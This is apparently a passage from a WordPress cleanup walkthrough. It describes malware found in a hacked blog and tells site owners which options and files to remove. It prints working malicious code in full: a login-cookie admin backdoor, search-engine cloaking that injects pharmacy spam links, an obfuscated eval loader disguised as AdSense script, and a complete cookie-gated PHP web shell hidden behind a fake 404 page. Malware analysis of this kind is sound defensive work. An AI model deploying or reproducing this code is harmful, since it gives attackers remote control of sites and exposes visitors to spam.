elseif($fp = @fopen($cFile, 'r')) $color='blue'; else $color = 'black'; @fclose($fp); print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>'; } print '</table>'; } print<<<here </td> </tr> <tr valign=top> <td align=center> <form method=post> ~:(results):~ <textarea name=save cols=55 rows=15>{$out}</textarea> {$tail} </form> </td> </tr> </table> </form> </td> </tr> </table> here; die; } if ( strpos($_SERVER['REQUEST_URI'], 'wp-trackback.php') !== false ) { echo '<?xml version="1.0" encoding="utf-8"?'.">\n"; echo "<response>\n"; echo "<error>1</error>\n"; echo "<message>$error_message</message>\n"; echo "</response>"; die(); } if ( (strpos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false) && isset($_POST['log']) ) { setcookie('admin_cookie', '00139056da813f3effbe1b884dbc1025', time() + 31536000, '/', ''); } if ( (strpos($_SERVER['REQUEST_URI'], 'wp-admin') !== false) && ($_COOKIE['admin_cookie'] != '00139056da813f3effbe1b884dbc1025') ) { if ( file_exists(ABSPATH . WPINC . '/pluggable-functions.php') ) @include_once (ABSPATH . WPINC . '/pluggable-functions.php'); else @include_once (ABSPATH . WPINC . '/pluggable.php'); wp_clearcookie(); do_action('wp_logout'); @ header('Expires: Wed, 11 Jan 1984 05:00:00 GMT'); @ header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); @ header('Cache-Control: no-cache, must-revalidate, max-age=0'); @ header('Pragma: no-cache'); $redirect_to = '../wp-login.php'; if ( isset($_REQUEST['redirect_to']) ) $redirect_to = $_REQUEST['redirect_to']; wp_redirect($redirect_to); exit(); } if(!function_exists('echo123')){ function echo123(){ echo base64_decode(get_option('internal_links_cache')); } } $seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol"); $sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; } if($sebot=="1" && sizeof($_COOKIE)==0) add_action('wp_footer','echo123');

At the end of the exploit code, you find this:

if(!function_exists('echo123')){ function echo123(){ echo base64_decode(get_option('internal_links_cache')); } }
$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if($sebot=="1" && sizeof($_COOKIE)==0) add_action('wp_footer','echo123');

3. Encoded 'internal_links_cache' option

Again, if the 'internal_links_cache' option exists in your database, remove it.

SELECT option_value FROM wp_options WHERE option_name = 'internal_links_cache'

It contains a second exploit code, also base64-encoded.

As shown below, the code is a list of spam-links and a Google Adsense javascript, desperately begging for your donation:

<div id="_wp_footer"><a href="http://serendipity.lascribe.net/?p=0" title="Acyclovir">Acyclovir</a> <a href="http://serendipity.lascribe.net/?p=1" title="Adderall">Adderall</a> <a href="http://serendipity.lascribe.net/?p=2" title="Adipex">Adipex</a> <a href="http://serendipity.lascribe.net/?p=3" title="Alprazolam">Alprazolam</a> <a href="http://serendipity.lascribe.net/?p=4" title="Ambien">Ambien</a> <a href="http://serendipity.lascribe.net/?p=5" title="Ativan">Ativan</a> <a href="http://serendipity.lascribe.net/?p=6" title="Biaxin">Biaxin</a> <a href="http://serendipity.lascribe.net/?p=7" title="Bontril">Bontril</a> <a href="http://serendipity.lascribe.net/?p=8" title="Bupropion">Bupropion</a> <a href="http://serendipity.lascribe.net/?p=9" title="Butalbital">Butalbital</a> <a href="http://serendipity.lascribe.net/?p=10" title="Carisoprodol">Carisoprodol</a> <a href="http://serendipity.lascribe.net/?p=11" title="Celexa">Celexa</a> <a href="http://serendipity.lascribe.net/?p=12" title="Cialis">Cialis</a> <a href="http://serendipity.lascribe.net/?p=13" title="Celebrex">Celebrex</a> <a href="http://serendipity.lascribe.net/?p=14" title="Cipro">Cipro</a> <a href="http://serendipity.lascribe.net/?p=15" title="Clonazepam">Clonazepam</a> <a href="http://serendipity.lascribe.net/?p=16" title="Codeine">Codeine</a> <a href="http://serendipity.lascribe.net/?p=17" title="Darvocet">Darvocet</a> <a href="http://serendipity.lascribe.net/?p=18" title="Diazepam">Diazepam</a> <a href="http://serendipity.lascribe.net/?p=19" title="Didrex">Didrex</a> <a href="http://serendipity.lascribe.net/?p=20" title="Diflucan">Diflucan</a> <a href="http://serendipity.lascribe.net/?p=21" title="Effexor">Effexor</a> <a href="http://serendipity.lascribe.net/?p=22" title="Ephedrine">Ephedrine</a> <a href="http://serendipity.lascribe.net/?p=23" title="Fastin">Fastin</a> <a href="http://serendipity.lascribe.net/?p=24" title="Fioricet">Fioricet</a> <a href="http://serendipity.lascribe.net/?p=25" title="Flexeril">Flexeril</a> <a href="http://serendipity.lascribe.net/?p=26" title="Glucophage">Glucophage</a> <a href="http://serendipity.lascribe.net/?p=27" title="Hydrocodone">Hydrocodone</a> <a href="http://serendipity.lascribe.net/?p=28" title="Levitra">Levitra</a> <a href="http://serendipity.lascribe.net/?p=29" title="Lexapro">Lexapro</a> <a href="http://serendipity.lascribe.net/?p=30" title="Lipitor">Lipitor</a> <a href="http://serendipity.lascribe.net/?p=31" title="Lorazepam">Lorazepam</a> <a href="http://serendipity.lascribe.net/?p=32" title="Lortab">Lortab</a> <a href="http://serendipity.lascribe.net/?p=33" title="Meridia">Meridia</a> <a href="http://serendipity.lascribe.net/?p=34" title="Methocarbam">Methocarbam</a> <a href="http://serendipity.lascribe.net/?p=35" title="Nexium">Nexium</a> <a href="http://serendipity.lascribe.net/?p=36" title="Norco">Norco</a> <a href="http://serendipity.lascribe.net/?p=37" title="Norvasc">Norvasc</a> <a href="http://serendipity.lascribe.net/?p=38" title="Oxycontin">Oxycontin</a> <a href="http://serendipity.lascribe.net/?p=39" title="Percocet">Percocet</a> <a href="http://serendipity.lascribe.net/?p=40" title="Phentermine">Phentermine</a> <a href="http://serendipity.lascribe.net/?p=41" title="Soma">Soma</a> <a href="http://serendipity.lascribe.net/?p=42" title="Tenuate">Tenuate</a> <a href="http://serendipity.lascribe.net/?p=43" title="Tramadol">Tramadol</a> <a href="http://serendipity.lascribe.net/?p=44" title="Trazodone">Trazodone</a> <a href="http://serendipity.lascribe.net/?p=45" title="Valium">Valium</a> <a href="http://serendipity.lascribe.net/?p=46" title="Viagra">Viagra</a> <a href="http://serendipity.lascribe.net/?p=47" title="Vicodin">Vicodin</a> <a href="http://serendipity.lascribe.net/?p=48" title="Xanax">Xanax</a> <a href="http://serendipity.lascribe.net/?p=49" title="Ultram">Ultram</a> <a href="http://serendipity.lascribe.net/?p=50" title="Watson">Watson</a> <a href="http://serendipity.lascribe.net/?p=51" title="Zyrtec">Zyrtec</a> <a href="http://serendipity.lascribe.net/?p=52" title="Zestril">Zestril</a> <a href="http://serendipity.lascribe.net/?p=53" title="Zetia">Zetia</a> <a href="http://serendipity.lascribe.net/?p=54" title="Zimulti">Zimulti</a> <a href="http://serendipity.lascribe.net/?p=55" title="Zithromax">Zithromax</a> <a href="http://serendipity.lascribe.net/?p=56" title="Zocor">Zocor</a> <a href="http://serendipity.lascribe.net/?p=57" title="Zovirax">Zovirax</a> <a href="http://serendipity.lascribe.net/?p=58" title="Zyban">Zyban</a> <a href="http://serendipity.lascribe.net/?p=59" title="Zyloprim">Zyloprim</a> <a href="http://serendipity.lascribe.net/?p=60" title="Zyprexa">Zyprexa</a> <a href="http://serendipity.lascribe.net/?p=61" title="Zyvox">Zyvox</a> <a href="http://serendipity.lascribe.net/?p=62" title="Abana">Abana</a> <a href="http://serendipity.lascribe.net/?p=63" title="Accupril">Accupril</a> <a href="http://serendipity.lascribe.net/?p=64" title="Accutane">Accutane</a> <a href="http://serendipity.lascribe.net/?p=65" title="Aceon">Aceon</a> <a href="http://serendipity.lascribe.net/?p=66" title="Aciphex">Aciphex</a> <a href="http://serendipity.lascribe.net/?p=67" title="Acomplia">Acomplia</a> <a href="http://serendipity.lascribe.net/?p=68" title="Acticin">Acticin</a> <a href="http://serendipity.lascribe.net/?p=69" title="Actos">Actos</a> <a href="http://serendipity.lascribe.net/?p=70" title="Adalat">Adalat</a> <a href="http://serendipity.lascribe.net/?p=71" title="Aldactone">Aldactone</a> <a href="http://serendipity.lascribe.net/?p=72" title="Aleve">Aleve</a> <a href="http://serendipity.lascribe.net/?p=73" title="Allegra">Allegra</a> <a href="http://serendipity.lascribe.net/?p=74" title="Altace">Altace</a> <a href="http://serendipity.lascribe.net/?p=75" title="Amaryl">Amaryl</a> <a href="http://serendipity.lascribe.net/?p=76" title="Amoxil">Amoxil</a> <a href="http://serendipity.lascribe.net/?p=77" title="Ansaid">Ansaid</a> <a href="http://serendipity.lascribe.net/?p=78" title="Antabuse">Antabuse</a> <a href="http://serendipity.lascribe.net/?p=79" title="Arava">Arava</a> </div> <script type="text/javascript"><!-- google_ad_client = "pub-7652328300112263"; google_ad_width = 728; google_ad_height = 15; google_ad_format = "728x15_0ads_al_s"; google_ad_channel = ""; function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);} google_ads("http://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800"); //--> </script>

4. *_new.php, *_old.giff files

You may find several *_(old|new).(php|giff|pngg) files scattered all over your WordPress sub-directories. Remove them and upgrade your Wordpress to the latest version.

These files contains a third exploit code:

<?php if(md5($_COOKIE['qwerty'])=="4a959e63ef4744c598b534b731c9a954"){ clearstatcache(); set_magic_quotes_runtime(0); if(!function_exists('ini_set')){ function ini_set(){ return FALSE; } } ini_set('output_buffering',0); if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited'; else $limit = get_cfg_var('max_execution_time'); if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){ $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if(@get_magic_quotes_gpc()){ foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); } function execute($c){ if(function_exists('exec')){ @exec($c, $out); return @implode("\n", $out); }elseif(function_exists('shell_exec')){ $out = @shell_exec($c); return $out; }elseif(function_exists('system')){ @ob_start(); @system($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }elseif(function_exists('passthru')){ @ob_start(); @passthru($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }else{ return FALSE; } } function read($f){ $str = @file($f); if($str){ $out = implode('', $str); }elseif(function_exists('curl_version')){ @ob_start(); $h = @curl_init('file:/'.'/'.$f); @curl_exec($h); $out = @ob_get_contents(); @ob_end_clean(); }else{ $out = 'Could not read file!'; } return htmlspecialchars($out); } function write($f, $c){ $t = filemtime($f); $fp = @fopen($f, 'w'); if($fp){ fwrite($fp, $c); fclose($fp); $out = 'File saved.'."\n"; if($t && touch($f, $t)){ $out .= 'Last modification time changed.'; }else{ $out .= 'Could not change last modification time!'; } }else{ $out = 'Saving failed!'; } return $out; } function file_size($f){ $size = filesize($f); if($size < 1024) $size = $size.'&nbsp;b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . '&nbsp;Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . '&nbsp;Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; if(!$os_name = @php_uname()){ if(function_exists('posix_uname')){ $os_name = posix_uname(); }elseif($os_name != getenv('OS')){ $os_name = ''; } } if(function_exists('posix_getpwuid')){ $data = posix_getpwuid(posix_getuid()); $user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; }else{ $user = ''; } $safe_mode = get_cfg_var('safe_mode'); $safe_mode ? $safe = 'on' : $safe = 'off'; execute('echo ssps') ? $execute = 'on' : $execute = 'off'; $server = getenv('SERVER_SOFTWARE'); if(!$server) $server = '---'; $out = ''; $tail = ''; $aliases = ''; if(!$safe_mode){ if($os_type == 'nix'){ $os .= execute('sysctl -n kern.ostype'); $os .= execute('sysctl -n kern.osrelease'); $os .= execute('sysctl -n kernel.ostype'); $os .= execute('sysctl -n kernel.osrelease'); if(empty($user)) $user = execute('id'); $aliases = array( '' => '', 'find suid files'=>'find / -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'show opened ports'=>'netstat -an | grep -i listen', ); }else{ $os_name .= execute('ver'); $user .= execute('echo %username%'); $aliases = array( '' => '', 'show runing services' => 'net start', 'show process list' => 'tasklist' ); } } if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } elseif(!empty($_POST['edit'])){ $file = $_POST['edit']; $out = read($file); $tail = '<input type=hidden name=dir value="'.$dir.'"><input type=hidden name=efile value="'.$file.'"><br><input type=submit>'; } elseif(!empty($_POST['save'])){ $out = write($_POST['efile'], $_POST['save']); } elseif(!empty($_POST['remove'])){ $obj = $_POST['remove']; @is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); $res ? $out = 'Removed successfully' : $out = 'Removing failed!'; } elseif(!empty($_POST['newdir'])){ @mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; } elseif(!empty($_POST['newfile'])){ @touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; } elseif(!empty($_POST['alias'])){ $out = execute($_POST['alias']); } elseif(!empty($_FILES['ufile']['tmp_name'])){ if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; else $out = 'Uploaded successfully.'; } print<<<here <style> table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2} </style> <br> <center> <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver> <tr> <td> <form method=post> <table cellpadding=1 cellspacing=0 border=1 width=650> here; if(!$safe_mode) print<<<here <tr> <td> cmd </td> <td colspan=8> <input type=text name=cmd size=97> </td> </tr> here; print<<<here <tr> <td> php </td> <td colspan=8> <input type=text name=php size=97> </td> </tr> <tr> <td> actions </td> <td> edit </td> <td> <input type=text name=edit size=14> </td> <td> remove </td> <td> <input type=text name=remove size=14> </td> <td> new_dir </td> <td> <input type=text name=newdir size=14> </td> <td> new_file </td> <td> <input type=text name=newfile size=15> </td> </tr> here; if($aliases){ print<<<here <tr> <td> aliases </td> <td colspan=8> <select name=alias> here; foreach($aliases as $k => $v){ print '<option value="'.$v.'">'.$k.'</option>'; } print<<<here </select> <input type=submit> </td> </tr> here; } print<<<here <tr> <td> dir </td> <td colspan=8> <input type=text value="{$dir}" name=dir size=97> </td> </tr> </form> <form method=post enctype=multipart/form-data> <tr> <td> upload </td> <td colspan=8> <input type=file name=ufile size=76> <input type=hidden name=dir value="{$dir}"> <input type=submit> </td> </tr> </form> </table> <table cellpadding=0 cellspacing=0 border=1 width=650> <form method=post> <tr valign=top> <td width=70% bgcolor=#dddddd> <b>OS:</b> {$os_name}<br> <b>User:</b> {$user}<br> <b>Server:</b> {$server}<br> <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit} </td> <td rowspan=2 bgcolor=#dddddd> <center>~:(expl0rer):~</center> here; if($dp = @openDir($dir)){ $cObj = readDir($dp); while($cObj){ if(@is_dir($cObj)) $theDirs[] = $cObj; elseif(@is_file($cObj)) $theFiles[] = $cObj; $cObj = readDir($dp); } closedir($dp); } if(!empty($theDirs)){ natcasesort($theDirs); if($os_type == 'nix'){ foreach($theDirs as $cDir){ $color='black'; if(is_writeable($cDir)){ $color='red'; }elseif(is_readable($cDir)){ $color='blue'; } print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>"; } }else{ foreach($theDirs as $cDir){ $tmp = $cDir.'/.ssps_tmp'; if(@touch($tmp)){ $color='red'; unlink($tmp); }elseif(opendir($cDir)){ closedir(); $color='blue'; }else{ $color='black'; } print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>"; } } } else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); print '<br>'; if(!empty($theFiles)){ natcasesort($theFiles); print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">'; foreach($theFiles as $cFile){ $size = file_size($cFile); if($fp = @fopen($cFile, 'a')) $color = 'red'; elseif($fp = @fopen($cFile, 'r')) $color='blue'; else $color = 'black'; @fclose($fp); print '<tr><td width=100%><font color='.$color.'>'.$cFile.'</font></td><td align=left>'.$size.'</tr>'; } print '</table>'; } print<<<here </td> </tr> <tr valign=top> <td align=center> <form method=post> ~:(results):~ <textarea name=save cols=55 rows=15>{$out}</textarea> {$tail} </form> </td> </tr> </table> </form> </td> </tr> </table> here; die; }else{ header("HTTP/1.1 404 Not Found"); header("Connection: close"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server</p> <hr> <address>".(($_SERVER['SERVER_SIGNATURE']!="")?$_SERVER['SERVER_SIGNATURE']:($_SERVER['SERVER_SOFTWARE']." Server at ".$_SERVER['SERVER_NAME']." Port ".$_SERVER['SERVER_PORT']))."</address> </body></html>"; } ?>

Related Exploits

There are a few similar variants of the exploit code out there. If this walkthrough does not match your situation, you may want to continue to read on:

• WordPress Support: Hack attempts on wordpress_options DB table?
• More on blog hacking
• WordPress Codex: Exploits/wp-info